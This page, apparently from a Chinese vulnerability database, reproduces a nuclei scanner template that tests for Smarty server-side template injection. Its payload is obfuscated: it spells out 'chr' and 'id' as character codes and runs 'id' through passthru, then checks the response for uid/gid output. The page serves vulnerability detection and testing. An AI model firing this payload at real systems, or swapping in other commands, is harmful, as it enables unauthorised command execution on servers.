smarty-ssti: Smarty - Server Side Template Injection

日期: 2025-08-01 | 影响软件: Smarty | POC: 已公开

漏洞描述

In PHP template engine Smarty, template injection is possible by exploiting the passthru function combined with array_map and chr.

PoC代码[已公开]

id: smarty-ssti

info:
  name: Smarty - Server Side Template Injection
  author: ritikchaddha
  severity: high
  description: |
    In PHP template engine Smarty, template injection is possible by exploiting the passthru function combined with array_map and chr.
  reference:
    - https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation
  metadata:
    max-request: 1
  tags: smarty,ssti,dast,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      injection:
        - "{{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}}"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{injection}}"

    skip-variables-check: true
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4a0a00473045022004c212da2f8b81a0f6c5ad987105d2afba2f93605790a77ba23b8eb950c09edf022100f2b45fa9edd071b1a2a0be1b4c457b493b452dcbc09aa3583ccebec9212782a9:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssti/smarty-ssti.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐